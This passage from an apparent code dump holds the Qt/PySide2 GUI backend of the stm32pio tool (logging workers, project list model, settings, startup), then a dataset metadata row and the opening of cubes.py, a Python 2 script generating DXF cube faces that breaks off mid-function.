f"logging setup misconfiguration. Anyway, the message was:\n{record.msg}")
class LoggingWorker(QObject):
"""
QObject living in a separate QThread, logging everything it receiving. Intended to be an attached
ProjectListItem property. Stringifies log records using global BuffersDispatchingHandler instance (its
stm32pio.core.util.DispatchingFormatter, to be precise) and passes them via Qt Signal interface so they can be
    conveniently received by any Qt entity. Also, the level of the message is attached so the receiver can
    interpret messages differently.
Can be controlled by two threading.Event's:
stopped - on activation, leads to thread termination
        can_flush_log - use this to temporarily hold the logs in an internal buffer while waiting for some event to
            occur (for example GUI widgets to load), and then flush them when the time has come
"""
sendLog = Signal(str, int)
def __init__(self, project_id: ProjectID, parent: QObject = None):
super().__init__(parent=parent)
self.project_id = project_id
self.buffer = collections.deque()
projects_logger_handler.buffers[project_id] = self.buffer # register our buffer
self.stopped = threading.Event()
self.can_flush_log = threading.Event()
self.thread = QThread(parent=self)
self.moveToThread(self.thread)
self.thread.started.connect(self.routine)
self.thread.start()
def routine(self) -> None:
"""
The worker constantly querying the buffer on the new log messages availability
"""
while not self.stopped.wait(timeout=0.050):
if self.can_flush_log.is_set() and len(self.buffer):
record = self.buffer.popleft()
self.sendLog.emit(projects_logger_handler.format(record), record.levelno)
# TODO: maybe we should flush all remaining logs before termination
projects_logger_handler.buffers.pop(self.project_id) # unregister our buffer
module_logger.debug(f"exit LoggingWorker of project id {self.project_id}")
self.thread.quit()
class ProjectListItem(QObject):
"""
The core functionality class - the wrapper around the Stm32pio class suitable for the project GUI representation
"""
logAdded = Signal(str, int, arguments=['message', 'level']) # send the log message to the front-end
initialized = Signal(ProjectID, arguments=['project_id'])
    def __init__(self, project_args: List[Any] = None, project_kwargs: Mapping[str, Any] = None,
from_startup: bool = False, parent: QObject = None):
"""
        Instance construction is split into 2 phases: the wrapper setup and the inner Stm32pio class initialization.
        The latter is moved out to a separate thread as it is, potentially, a time-consuming operation. This thread
        starts right after the main constructor so the wrapper is already built at that moment and can therefore be
        used from the GUI, be referenced and so on.
Args:
project_args: list of positional arguments that will be passed to the Stm32pio constructor
project_kwargs: dictionary of keyword arguments that will be passed to the Stm32pio constructor
from_startup: mark that this project comes from the beginning of the app life (e.g. from the NV-storage) so
it can be treated differently on the GUI side
parent: Qt parent
"""
super().__init__(parent=parent)
if project_args is None:
project_args = []
if project_kwargs is None:
project_kwargs = {}
self._from_startup = from_startup
underlying_logger = logging.getLogger('stm32pio.gui.projects')
self.logger = stm32pio.core.util.ProjectLoggerAdapter(underlying_logger, { 'project_id': id(self) })
self.logging_worker = LoggingWorker(project_id=id(self))
self.logging_worker.sendLog.connect(self.logAdded)
# QThreadPool can automatically queue new incoming tasks if a number of them are larger than maxThreadCount
self.workers_pool = QThreadPool(parent=self)
self.workers_pool.setMaxThreadCount(1)
self.workers_pool.setExpiryTimeout(-1) # tasks wait forever for the available spot
self._current_action: str = ''
self._last_action_succeed: bool = True
# These values are valid only until the Stm32pio project initialize itself (or failed to) (see init_project)
self.project = None
self._name = 'Loading...'
self._state = { 'LOADING': True } # pseudo-stage (not present in the ProjectStage enum but is used from QML)
self._current_stage = 'Loading...'
self.qml_ready = threading.Event() # the front and the back both should know when each other is initialized
# Register some kind of the deconstruction handler (later, after the project initialization, see init_project)
self._finalizer = None
if 'instance_options' not in project_kwargs:
project_kwargs['instance_options'] = { 'logger': self.logger }
elif 'logger' not in project_kwargs['instance_options']:
project_kwargs['instance_options']['logger'] = self.logger
# Start the Stm32pio part initialization right after. It can take some time so we schedule it in a dedicated
# thread
init_thread = threading.Thread(target=self.init_project, args=project_args, kwargs=project_kwargs)
init_thread.start()
def init_project(self, *args, **kwargs) -> None:
"""
Initialize the underlying Stm32pio project.
Args:
*args: positional arguments of the Stm32pio constructor
**kwargs: keyword arguments of the Stm32pio constructor
"""
try:
self.project = stm32pio.core.lib.Stm32pio(*args, **kwargs)
except Exception:
stm32pio.core.util.log_current_exception(self.logger)
if len(args):
self._name = args[0] # use a project path string (as it should be a first argument) as a name
else:
self._name = 'Undefined'
self._state = { 'INIT_ERROR': True } # pseudo-stage
self._current_stage = 'Initializing error'
else:
# Successful initialization. These values should not be used anymore but we "reset" them anyway
self._name = 'Project'
self._state = {}
self._current_stage = 'Initialized'
finally:
# Register some kind of the deconstruction handler
self._finalizer = weakref.finalize(self, self.at_exit, self.workers_pool, self.logging_worker,
self.name if self.project is None else str(self.project))
self.qml_ready.wait() # wait for the GUI to initialize (which one is earlier, actually, back or front)
# TODO: causing
# RuntimeWarning: libshiboken: Overflow: Value 4595188736 exceeds limits of type [signed] "i" (4bytes).
# OverflowError
self.initialized.emit(id(self))
self.nameChanged.emit() # in any case we should notify the GUI part about the initialization ending
self.stageChanged.emit()
self.stateChanged.emit()
@staticmethod
def at_exit(workers_pool: QThreadPool, logging_worker: LoggingWorker, name: str):
"""
The instance deconstruction handler is meant to be used with weakref.finalize() conforming with the requirement
to have no reference to the target object (so it doesn't contain any instance reference and also is decorated as
'staticmethod')
"""
# Wait forever for all the jobs to complete. Currently, we cannot abort them gracefully
workers_pool.waitForDone(msecs=-1)
logging_worker.stopped.set() # post the event in the logging worker to inform it...
logging_worker.thread.wait() # ...and wait for it to exit, too
module_logger.info(f"destroyed {name}")
@Property(bool)
def fromStartup(self) -> bool:
"""Is this project is here from the beginning of the app life?"""
return self._from_startup
@Property('QVariant')
def config(self) -> dict:
"""Inner project's ConfigParser config converted to the dictionary (QML JS object)"""
return {
section: {
key: value for key, value in self.project.config.items(section)
} if self.project is not None else {} for section in ['app', 'project']
}
nameChanged = Signal()
@Property(str, notify=nameChanged)
def name(self) -> str:
"""Human-readable name of the project. Will evaluate to the absolute path if it cannot be instantiated"""
if self.project is not None:
return self.project.path.name
else:
return self._name
stateChanged = Signal()
@Property('QVariant', notify=stateChanged)
def state(self) -> dict:
"""
Get the current project state in the appropriate Qt form. Update the cached 'current stage' value as a side
effect
"""
if self.project is not None:
state = self.project.state
# Side-effect: caching the current stage at the same time to avoid the flooding of calls to the 'state'
# getter (many IO operations). Requests to 'state' and 'stage' are usually goes together so there is no need
# to necessarily keeps them separated
self._current_stage = str(state.current_stage)
state.pop(stm32pio.core.lib.ProjectStage.UNDEFINED) # exclude UNDEFINED key
# Convert to {string: boolean} dict (will be translated into the JavaScript object)
return { stage.name: value for stage, value in state.items() }
else:
return self._state
stageChanged = Signal()
@Property(str, notify=stageChanged)
def currentStage(self) -> str:
"""
Get the current stage the project resides in.
Note: this returns a cached value. Cache updates every time the state property got requested
"""
return self._current_stage
@Property(str)
def currentAction(self) -> str:
"""
Stm32pio action (i.e. function name) that is currently executing or an empty string if there is none. It is set
on actionStarted signal and reset on actionFinished
"""
return self._current_action
@Property(bool)
def lastActionSucceed(self) -> bool:
"""Have the last action ended with a success?"""
return self._last_action_succeed
actionStarted = Signal(str, arguments=['action'])
@Slot(str)
def actionStartedSlot(self, action: str):
"""Pass the corresponding signal from the worker, perform related tasks"""
# Currently, this property should be set BEFORE emitting the 'actionStarted' signal (because QML will query it
# when the signal will be handled in StateMachine) (probably, should be resolved later as it is bad to be bound
# to such a specific logic)
self._current_action = action
self.actionStarted.emit(action)
actionFinished = Signal(str, bool, arguments=['action', 'success'])
@Slot(str, bool)
def actionFinishedSlot(self, action: str, success: bool):
"""Pass the corresponding signal from the worker, perform related tasks"""
self._last_action_succeed = success
if not success:
# Clear the queue - stop further execution (cancel planned tasks if an error had happened)
self.workers_pool.clear()
self.actionFinished.emit(action, success)
# Currently, this property should be reset AFTER emitting the 'actionFinished' signal (because QML will query it
# when the signal will be handled in StateMachine) (probably, should be resolved later as it is bad to be bound
# to such a specific logic)
self._current_action = ''
@Slot()
def qmlLoaded(self):
"""Event signaling the complete loading of the needed frontend components"""
self.qml_ready.set()
self.logging_worker.can_flush_log.set()
@Slot(str, 'QVariantList')
def run(self, action: str, args: List[Any]):
"""
Asynchronously perform Stm32pio actions (generate, build, etc.) (dispatch all business logic).
Args:
action: method name of the corresponding Stm32pio action
args: list of positional arguments for this action
"""
worker = Worker(getattr(self.project, action), args, self.logger, parent=self)
worker.started.connect(self.actionStartedSlot)
worker.finished.connect(self.actionFinishedSlot)
worker.finished.connect(self.stateChanged)
worker.finished.connect(self.stageChanged)
self.workers_pool.start(worker) # will automatically place to the queue
class Worker(QObject, QRunnable):
"""
Generic worker for asynchronous processes: QObject + QRunnable combination. First allows to attach Qt signals,
second is compatible with the QThreadPool
"""
started = Signal(str, arguments=['action'])
finished = Signal(str, bool, arguments=['action', 'success'])
def __init__(self, func: Callable[[List[Any]], Optional[int]], args: List[Any] = None,
logger: logging.Logger = None, parent: QObject = None):
"""
Args:
func: function to run. It should return 0 or None for the call to be considered successful
args: the list of positional arguments. They will be unpacked and passed to the function
logger: optional logger to report about the occurred exception
parent: Qt object
"""
QObject.__init__(self, parent=parent)
QRunnable.__init__(self)
self.func = func
self.args = args if args is not None else []
self.logger = logger
self.name = func.__name__
def run(self):
self.started.emit(self.name) # notify the caller
try:
result = self.func(*self.args)
except Exception:
if self.logger is not None:
stm32pio.core.util.log_current_exception(self.logger)
result = -1
if result is None or (type(result) == int and result == 0):
success = True
else:
success = False
self.finished.emit(self.name, success) # notify the caller
if not success:
# Pause the thread and, therefore, the parent QThreadPool queue so the caller can decide whether we should
# proceed or stop. This should not cause any problems as we've already perform all necessary tasks and this
# just delaying the QRunnable removal from the pool
time.sleep(1.0)
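# Usage sketch (illustrative; 'some_task' stands for any callable returning 0/None on success):
#   worker = Worker(some_task, args=['foo'], logger=module_logger)
#   worker.finished.connect(lambda action, success: print(action, success))
#   QThreadPool.globalInstance().start(worker)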
class ProjectsList(QAbstractListModel):
"""
QAbstractListModel implementation - describe basic operations and delegate all main functionality to the
ProjectListItem
"""
goToProject = Signal(int, arguments=['indexToGo']) # TODO: should probably belongs to list
def __init__(self, projects: List[ProjectListItem] = None, parent: QObject = None):
"""
Args:
projects: initial list of projects
parent: QObject to be parented to
"""
super().__init__(parent=parent)
self.projects = projects if projects is not None else []
self.workers_pool = QThreadPool(parent=self)
self.workers_pool.setMaxThreadCount(1) # only 1 active worker at a time
self.workers_pool.setExpiryTimeout(-1) # tasks wait forever for the available spot
@Slot(int, result=ProjectListItem)
def get(self, index: int):
"""
Expose the ProjectListItem to the GUI QML side. You should firstly register the returning type using
qmlRegisterType or similar
"""
if index in range(len(self.projects)):
return self.projects[index]
def rowCount(self, parent=None, *args, **kwargs):
return len(self.projects)
def data(self, index: QModelIndex, role=None):
if role == Qt.DisplayRole or role is None:
return self.projects[index.row()]
def _saveInSettings(self) -> None:
"""
Get correct projects and save them to Settings. Intended to be run in a thread (as it blocks)
"""
# Wait for all projects to be loaded (project.init_project is finished), whether successful or not
        while not all(project.name != 'Loading...' for project in self.projects):
            time.sleep(0.050)  # yield instead of spinning at 100% CPU while projects initialize
# Only correct ones (inner Stm32pio instance has been successfully constructed)
projects_to_save = [project for project in self.projects if project.project is not None]
settings.beginGroup('app')
settings.remove('projects') # clear the current saved list
settings.beginWriteArray('projects')
for idx, project in enumerate(projects_to_save):
settings.setArrayIndex(idx)
# This ensures that we always save paths in pathlib form
settings.setValue('path', str(project.project.path))
settings.endArray()
settings.endGroup()
module_logger.info(f"{len(projects_to_save)} projects have been saved to Settings") # total amount
def saveInSettings(self) -> None:
"""Spawn a thread to wait for all projects and save them in background"""
self.workers_pool.start(Worker(self._saveInSettings, logger=module_logger, parent=self))
def each_project_is_duplicate_of(self, path: str) -> Iterator[bool]:
"""
Returns generator yielding an answer to the question "Is current project is a duplicate of one represented by a
given path?" for every project in this model, one by one.
Logic explanation: At a given time some projects (e.g., when we add a bunch of projects, recently added ones)
can be not instantiated yet so we cannot extract their project.path property and need to check before comparing.
In this case, simply evaluate strings. Also, samefile will even raise, if the given path doesn't exist.
"""
for list_item in self.projects:
try:
yield (list_item.project is not None and list_item.project.path.samefile(pathlib.Path(path))) or \
path == list_item.name # simply check strings if a path isn't available
except OSError:
yield False
def addListItem(self, path: str, list_item_kwargs: Mapping[str, Any] = None, go_to_this: bool = False,
on_initialized: Callable[[ProjectID], None] = None) -> ProjectListItem:
"""
        Create and append to the list tail a new ProjectListItem instance. This doesn't save in QSettings; that's up to
        the caller (e.g. if we are adding a bunch of projects, it makes sense to store them once at the end).
Args:
path: path as string
list_item_kwargs: keyword arguments passed to the ProjectListItem constructor
go_to_this: should we jump to the new project in GUI
            on_initialized: optional callback invoked with the project id once the underlying Stm32pio instance
                has been initialized (whether successfully or not)
"""
# Shallow copy, dict makes it mutable
list_item_kwargs = dict(list_item_kwargs if list_item_kwargs is not None else {})
duplicate_index = next((idx for idx, is_duplicated in enumerate(self.each_project_is_duplicate_of(path))
if is_duplicated), -1)
if duplicate_index > -1:
# Just added project is already in the list so abort the addition
module_logger.warning(f"This project is already in the list: {path}")
# If some parameters were provided, merge them
proj_params = list_item_kwargs.get('project_kwargs', {}).get('parameters', {})
if len(proj_params):
self.projects[duplicate_index].logger.info(f"updating parameters from the CLI... {proj_params}")
# Note: will save stm32pio.ini even if there was not one
self.projects[duplicate_index].run('save_config', [proj_params])
self.goToProject.emit(duplicate_index) # jump to the existing one
return self.projects[duplicate_index]
else:
# Insert given path into the constructor args (do not use dict.update() as we have list value that we also
# want to "merge")
if len(list_item_kwargs) == 0:
list_item_kwargs = { 'project_args': [path] }
elif 'project_args' not in list_item_kwargs or len(list_item_kwargs['project_args']) == 0:
list_item_kwargs['project_args'] = [path]
else:
list_item_kwargs['project_args'][0] = path
# The project is ready to be appended to the model right after the main constructor (wrapper) finished.
# The underlying Stm32pio class will be initialized soon later in the dedicated thread
project = ProjectListItem(**list_item_kwargs)
if on_initialized is not None:
project.initialized.connect(on_initialized)
self.beginInsertRows(QModelIndex(), self.rowCount(), self.rowCount())
self.projects.append(project)
self.endInsertRows()
if go_to_this:
self.goToProject.emit(len(self.projects) - 1) # append always at the end
return project
@Slot('QStringList')
def addProjectsByPaths(self, paths: List[str]):
"""QUrl path (typically is sent from the QML GUI)"""
if len(paths):
for path_str in paths: # convert to strings
path_qurl = QUrl(path_str)
if path_qurl.isEmpty():
module_logger.warning(f"Given path is empty: {path_str}")
continue
elif path_qurl.isLocalFile(): # file://...
path: str = path_qurl.toLocalFile()
elif path_qurl.isRelative(): # this means that the path string is not starting with 'file://' prefix
path: str = path_str # just use a source string
else:
module_logger.error(f"Incorrect path: {path_str}")
continue
self.addListItem(path, list_item_kwargs={ 'parent': self })
self.saveInSettings() # save after all
else:
module_logger.warning("No paths were given")
@Slot(int)
def removeProject(self, index: int):
"""
Remove the project residing on the index both from the runtime list and QSettings
"""
if index in range(len(self.projects)):
self.beginRemoveRows(QModelIndex(), index, index)
project = self.projects.pop(index)
self.endRemoveRows()
# Re-save the settings only if this project is saved in the settings
if project.project is not None or project.fromStartup:
self.saveInSettings()
# It allows the project to be deconstructed (i.e. GC'ed) very soon, not at the app shutdown time
project.deleteLater()
class Settings(QSettings):
"""
Extend the class by useful get/set methods allowing to avoid redundant code lines and also are callable from the
QML side
"""
DEFAULTS = {
'editor': '',
'verbose': False,
'notifications': True
}
def __init__(self, prefix: str, defaults: Mapping[str, Any] = None, qs_args: List[Any] = None,
qs_kwargs: Mapping[str, Any] = None, external_triggers: Mapping[str, Callable[[str], Any]] = None):
"""
Args:
prefix: this prefix will always be added when get/set methods will be called so use it to group some most
important preferences under a single name. For example, prefix='app/params' while the list of users is
located in 'app/users'
defaults: mapping of fallback values (under the prefix mentioned above) that will be used if there is no
matching key in the storage
qs_args: positional arguments that will be passed to the QSettings constructor
qs_kwargs: keyword arguments that will be passed to the QSettings constructor
external_triggers: mapping where the keys are parameters names (under the prefix) and the values are
functions that will be called with the corresponding parameter value as the argument when the parameter
is going to be set. It's useful to setup the additional actions needed to be performed right after
a certain parameter gets an update
"""
qs_args = qs_args if qs_args is not None else []
qs_kwargs = qs_kwargs if qs_kwargs is not None else {}
super().__init__(*qs_args, **qs_kwargs)
self.prefix = prefix
defaults = defaults if defaults is not None else Settings.DEFAULTS
self.external_triggers = external_triggers if external_triggers is not None else {}
for key, value in defaults.items():
if not self.contains(self.prefix + key):
self.setValue(self.prefix + key, value)
@Slot()
def clear(self):
super().clear()
@Slot(str, result='QVariant')
def get(self, key):
value = self.value(self.prefix + key)
# On case insensitive file systems 'False' is saved as 'false' so we need to workaround this
if value == 'false':
value = False
elif value == 'true':
value = True
return value
@Slot(str, 'QVariant')
def set(self, key, value):
self.setValue(self.prefix + key, value)
if key in self.external_triggers.keys():
self.external_triggers[key](value)
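# Usage sketch (illustrative; main() below wires the 'verbose' flag the same way):
#   settings = Settings(prefix='app/settings/',
#                       external_triggers={'verbose': lambda value: print('verbose ->', value)})
#   settings.set('verbose', True)  # stores the value, then fires the trigger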
class Application(QApplicationClass):
loaded = Signal(str, bool, arguments=['action', 'success'])
def quit(self):
"""Shutdown"""
for window in self.allWindows():
window.close()
def parse_args(args: list) -> Optional[argparse.Namespace]:
parser = argparse.ArgumentParser(description=inspect.cleandoc('''stm32pio GUI version.
Visit https://github.com/ussserrr/stm32pio for more information.'''))
# Global arguments (there is also an automatically added '-h, --help' option)
parser.add_argument('--version', action='version', version=f"stm32pio v{stm32pio.core.util.get_version()}")
parser.add_argument('-d', '--directory', dest='path', default=str(pathlib.Path.cwd()),
help="path to the project (current directory, if not given, but any other option should be specified then)")
parser.add_argument('-b', '--board', dest='board', default='', help="PlatformIO name of the board")
return parser.parse_args(args) if len(args) else None
def main(sys_argv: List[str] = None):
if sys_argv is None:
sys_argv = sys.argv[1:]
args = parse_args(sys_argv)
module_log_handler = logging.StreamHandler()
module_log_handler.setFormatter(logging.Formatter("%(levelname)s %(funcName)s %(message)s"))
module_logger.addHandler(module_log_handler)
module_logger.setLevel(logging.INFO) # set this again later after getting QSettings
module_logger.info('Starting stm32pio GUI...')
def qt_message_handler(mode, context, message):
"""
Register this logging handler for the Qt stuff if your platform doesn't provide a built-in one or if you want to
customize it
"""
if mode == QtInfoMsg:
mode = logging.INFO
elif mode == QtWarningMsg:
mode = logging.WARNING
elif mode == QtCriticalMsg:
mode = logging.ERROR
elif mode == QtFatalMsg:
mode = logging.CRITICAL
else:
mode = logging.DEBUG
qml_logger.log(mode, message)
    # Apparently the Windows version of PySide2 doesn't have the QML logging feature turned on, so we fill this gap
# TODO: set up for other platforms too (separate console.debug, console.warn, etc.)
qml_logger = logging.getLogger('stm32pio.gui.qml')
if platform.system() == 'Windows':
qml_log_handler = logging.StreamHandler()
qml_log_handler.setFormatter(logging.Formatter("[QML] %(levelname)s %(message)s"))
qml_logger.addHandler(qml_log_handler)
qInstallMessageHandler(qt_message_handler)
app = Application(sys.argv)
# These are used as a settings identifier too
app.setOrganizationName('ussserrr')
app.setApplicationName('stm32pio')
app.setWindowIcon(QIcon(str(MODULE_PATH.joinpath('icons/icon.svg'))))
global settings
def verbose_setter(value):
"""Use this to toggle the verbosity of all loggers at once"""
module_logger.setLevel(logging.DEBUG if value else logging.INFO)
qml_logger.setLevel(logging.DEBUG if value else logging.INFO)
projects_logger.setLevel(logging.DEBUG if value else logging.INFO)
formatter.verbosity = stm32pio.core.util.Verbosity.VERBOSE if value else stm32pio.core.util.Verbosity.NORMAL
settings = Settings(prefix='app/settings/', qs_kwargs={ 'parent': app },
external_triggers={ 'verbose': verbose_setter })
# Use "singleton" real logger for all projects just wrapping it into the LoggingAdapter for every project
projects_logger = logging.getLogger('stm32pio.gui.projects')
projects_logger.setLevel(logging.DEBUG if settings.get('verbose') else logging.INFO)
formatter = stm32pio.core.util.DispatchingFormatter(
general={
stm32pio.core.util.Verbosity.NORMAL: logging.Formatter("%(levelname)-8s %(message)s"),
stm32pio.core.util.Verbosity.VERBOSE: logging.Formatter(
f"%(levelname)-8s %(funcName)-{stm32pio.core.settings.log_fieldwidth_function}s %(message)s")
})
projects_logger_handler.setFormatter(formatter)
projects_logger.addHandler(projects_logger_handler)
verbose_setter(settings.get('verbose')) # set initial verbosity settings based on the saved state
settings.beginGroup('app')
restored_projects_paths: List[str] = []
for index in range(settings.beginReadArray('projects')):
settings.setArrayIndex(index)
restored_projects_paths.append(settings.value('path'))
settings.endArray()
settings.endGroup()
engine = QQmlApplicationEngine(parent=app)
qmlRegisterType(ProjectListItem, 'ProjectListItem', 1, 0, 'ProjectListItem')
qmlRegisterType(Settings, 'Settings', 1, 0, 'Settings')
projects_model = ProjectsList(parent=engine)
boards_model = QStringListModel(parent=engine)
engine.rootContext().setContextProperty('appVersion', stm32pio.core.util.get_version())
engine.rootContext().setContextProperty('Logging', stm32pio.core.util.logging_levels)
engine.rootContext().setContextProperty('projectsModel', projects_model)
engine.rootContext().setContextProperty('boardsModel', boards_model)
engine.rootContext().setContextProperty('appSettings', settings)
engine.load(QUrl.fromLocalFile(str(MODULE_PATH.joinpath('main.qml'))))
main_window = engine.rootObjects()[0]
# Getting PlatformIO boards can take a long time when the PlatformIO cache is outdated but it is important to have
# them before the projects list is restored, so we start a dedicated loading thread. We actually can add other
# start-up operations here if there will be a need to. Use the same Worker class to spawn the thread at the pool
def loading():
boards = ['None'] + stm32pio.core.util.get_platformio_boards()
boards_model.setStringList(boards)
def loaded(action_name: str, success: bool):
try:
cli_project_provided = args is not None
initialized_projects_counter = 0
def on_initialized(_: ProjectID):
nonlocal initialized_projects_counter
initialized_projects_counter += 1
if initialized_projects_counter == (len(restored_projects_paths) + (1 if cli_project_provided else 0)):
app.loaded.emit(action_name, all((list_item.project is not None for list_item in projects_model.projects)))
# Qt objects cannot be parented from the different thread so we restore the projects list in the main thread
for path in restored_projects_paths:
projects_model.addListItem(path, go_to_this=False, on_initialized=on_initialized, list_item_kwargs={
'from_startup': True,
'parent': projects_model
})
# At the end, append (or jump to) a CLI-provided project, if there is one
if cli_project_provided:
list_item_kwargs = {
'from_startup': True,
'parent': projects_model # TODO: probably can be omitted and automatically passed in the addListItem method (as we do now with a path)
}
if args.board:
                    list_item_kwargs['project_kwargs'] = { 'parameters': { 'project': { 'board': args.board } } }  # what a mess, honestly...
projects_model.addListItem(str(pathlib.Path(args.path)), go_to_this=True, on_initialized=on_initialized,
list_item_kwargs=list_item_kwargs)
projects_model.saveInSettings()
except Exception:
stm32pio.core.util.log_current_exception(module_logger)
success = False
main_window.backendLoaded.emit(success) # inform the GUI
loader = Worker(loading, logger=module_logger, parent=app)
loader.finished.connect(loaded)
QThreadPool.globalInstance().start(loader)
return app
# [necessary] globals
module_logger = logging.getLogger('stm32pio.gui.app') # use it as a console logger for whatever you want to, typically
# not related to the concrete project
projects_logger_handler = BuffersDispatchingHandler() # a storage of the buffers for the logging messages of all
# current projects (see its docs for more info)
settings = QSettings() # placeholder, will be replaced in main()
if __name__ == '__main__':
app_ = main()
sys.exit(app_.exec_())
| [
"[email protected]"
] | |
6f1679a486350368d7e4ec61e40ca834617f7468 | a62bb1b90a1cd206ef1485132400a60a222357f8 | /cubes.py | 82928421e9f6d010c2ce0e631fcb22b0e4f21379 | [] | no_license | palfrey/cube_generator | d5b40cfdaace87bba49d6caf43b183ba109f40b1 | 36a97c6796ec7154bb9fdc9c9ec16920fb32c4fc | refs/heads/master | 2021-01-10T21:27:02.370544 | 2012-03-04T12:54:32 | 2012-03-04T12:54:32 | 1,470,305 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,274 | py | import sdxf
from enum import Enum
import random
import operator
from optparse import OptionParser, OptionValueError
import math
class Direction(Enum):
POS_X = 1
POS_Y = 2
POS_Z = 3
NEG_X = 4
NEG_Y = 5
NEG_Z = 6
class Space:
def __init__(self, size, dimensions):
assert len(size) == 3, size
self.grid = [[[[] for z in range(size[2])] for y in range(size[1])] for x in range(size[0])]
self.dimensions = dimensions
def addBox(self, coords, owner):
assert [a for a in coords if a<0] == [], coords
try:
self.grid[coords[0]][coords[1]][coords[2]].append(owner)
except IndexError:
print coords
raise
def removeBox(self, coords, owner):
assert [a for a in coords if a<0] == [], coords
try:
assert owner in self.grid[coords[0]][coords[1]][coords[2]]
self.grid[coords[0]][coords[1]][coords[2]].remove(owner)
except IndexError:
print coords
raise
def fixCubes(self, cube_side):
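		# Every unit box must end up with exactly one owning face: first split up
		# runs of boxes that share the same multi-owner set (round-robin between
		# the owners), then resolve the leftovers by looking at adjacent boxes.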
sets = {}
# sequences with the same multiple owners first
for x in range(len(self.grid)):
for y in range(len(self.grid[x])):
for z in range(len(self.grid[x][y])):
if len(self.grid[x][y][z])>1:
key = tuple(sorted(self.grid[x][y][z]))
if key not in sets:
sets[key] = []
sets[key].append((x,y,z))
for key in sorted(sets.keys()):
if len(sets[key]) == 1:
continue
print "fixing", key, sorted(sets[key])
idx = random.randrange(len(key))
for (x,y,z) in sorted(sets[key]):
current = key[idx]
self.grid[x][y][z] = [current]
for a in range(len(key)):
if a != idx:
current.markNeighbour(key[a],x,y,z)
key[a].deleteCube(x,y,z)
idx = (idx +1) % len(key)
for x in range(len(self.grid)):
x2 = x+1
for y in range(len(self.grid[x])):
y2 = y+1
for z in range(len(self.grid[x][y])):
z2 = z+1
def pickOwner(x2,y2,z2):
if x2 <0 or y2<0 or z2<0 or x2>=self.dimensions[0]*cube_side or y2>=self.dimensions[1]*cube_side or z2>=self.dimensions[2]*cube_side:
return None
possibleOwner = self.grid[x2][y2][z2]
if len(possibleOwner) == 0: # nothing there
return None
if len(possibleOwner)!=1: # can't use it
return None
#assert len(possibleOwner) == 1, (possibleOwner, x2,y2,z2,x,y,z)
possibleOwner = possibleOwner[0]
if possibleOwner in self.grid[x][y][z]:
return possibleOwner
else:
return None
if len(self.grid[x][y][z])>1:
axes = range(3)
random.shuffle(axes)
for axe in axes:
if axe == 0: # X
poss = pickOwner(x-1,y,z)
if poss:
break
poss = pickOwner(x+1,y,z)
if poss:
break
elif axe == 1: # Y
poss = pickOwner(x,y-1,z)
if poss:
break
poss = pickOwner(x,y+1,z)
if poss:
break
elif axe == 2: # Z
poss = pickOwner(x,y,z-1)
if poss:
break
poss = pickOwner(x,y,z+1)
if poss:
break
else:
raise Exception, axe # shouldn't happen
if poss == None:
poss = self.grid[x][y][z][1]
#return
assert poss != None
for owner in self.grid[x][y][z]:
if owner == poss:
continue
owner.deleteCube(x,y,z)
self.grid[x][y][z] = [poss]
def generateCubes(self,d):
layers = {}
for x in range(len(self.grid)):
x2 = x+1
for y in range(len(self.grid[x])):
y2 = y+1
for z in range(len(self.grid[x][y])):
z2 = z+1
if len(self.grid[x][y][z]) == 0:
continue
owner = self.grid[x][y][z][0]
if owner.colour.value() not in layers:
layers[owner.colour.value()] = ("layer-%d"%owner.colour.value()).upper()
d.layers.append(sdxf.Layer(name=layers[owner.colour.value()], color=owner.colour.value()))
def doSide(points):
d.append(sdxf.Face(points=points, layer=layers[owner.colour.value()]))
doSide([(x,y,z),(x2,y,z),(x2,y2,z),(x,y2,z)])
doSide([(x,y,z),(x,y2,z),(x,y2,z2),(x,y,z2)])
doSide([(x,y,z),(x2,y,z),(x2,y,z2),(x,y,z2)])
doSide([(x2,y2,z2),(x,y2,z2),(x,y,z2),(x2,y,z2)])
doSide([(x2,y2,z2),(x2,y,z2),(x2,y,z),(x2,y2,z)])
doSide([(x2,y2,z2),(x,y2,z2),(x,y2,z),(x2,y2,z)])
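# Rough usage sketch (illustrative, e.g. a 2x2x2 arrangement of cubes of side 3):
#   space = Space((6, 6, 6), (2, 2, 2))
#   ... Face instances register their unit boxes via space.addBox(...) ...
#   space.fixCubes(3)       # give every contested unit box a single owning face
#   space.generateCubes(d)  # d is an sdxf.Drawing; emits one DXF face per cube side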
class DXFColours(Enum):
Red = 1
Yellow = 2
Green = 3
Cyan = 4
Blue = 5
Magenta = 6
White = 7
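# The numbering above follows the standard AutoCAD Color Index (ACI: 1=red ... 7=white),
# which is what the sdxf layers' 'color' attribute expects.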
class Face:
colours = list(iter(DXFColours))
last_colour = -1
last_index = -1
def __init__(self, direction, width, height, origin, space):
self.colour = Face.colours[Face.last_colour+1]
if Face.last_colour +2 >= len(Face.colours):
Face.last_colour = -1
else:
Face.last_colour +=1
self.index = Face.last_index +1
Face.last_index +=1
self.width = width
self.height = height
self.origin = list(origin)
self.grid = [[True for y in range(height)] for x in range(width)]
self.direction = direction
self.neighbour = [set() for x in range(4)]
#print "face", origin, width, height, self.colour
self.forAllCubes(space.addBox, (self,))
def removeCubes(self):
self.forAllCubes(space.removeBox, (self,))
def forAllCubes(self, func, args):
for a in range(self.width):
for b in range(self.height):
if self.direction == Direction.POS_X:
func((self.origin[0], self.origin[1]+a, self.origin[2]+b), *args)
elif self.direction == Direction.POS_Y:
func((self.origin[0]+a, self.origin[1], self.origin[2]+b), *args)
elif self.direction == Direction.POS_Z:
func((self.origin[0]+a, self.origin[1]+b, self.origin[2]), *args)
elif self.direction == Direction.NEG_X:
func((self.origin[0]-1, self.origin[1]-a-1, self.origin[2]-b-1), *args)
elif self.direction == Direction.NEG_Y:
func((self.origin[0]-a-1, self.origin[1]-1, self.origin[2]-b-1), *args)
elif self.direction == Direction.NEG_Z:
func((self.origin[0]-a-1, self.origin[1]-b-1, self.origin[2]-1), *args)
else:
raise Exception, self.direction
def _translateLocation(self, x, y, z):
if self.direction == Direction.POS_X:
assert self.origin[0] == x,x
assert y>=self.origin[1] and y<self.origin[1]+self.width,y
assert z>=self.origin[2] and z<self.origin[2]+self.height,z
assert self.grid[y-self.origin[1]][z-self.origin[2]]
return (y-self.origin[1],z-self.origin[2])
elif self.direction == Direction.POS_Y:
assert x>=self.origin[0] and x<self.origin[0]+self.width,x
assert self.origin[1] == y,y
assert z>=self.origin[2] and z<self.origin[2]+self.height,z
assert self.grid[x-self.origin[0]][z-self.origin[2]]
return (x-self.origin[0],z-self.origin[2])
elif self.direction == Direction.POS_Z:
assert x>=self.origin[0] and x<self.origin[0]+self.width,x
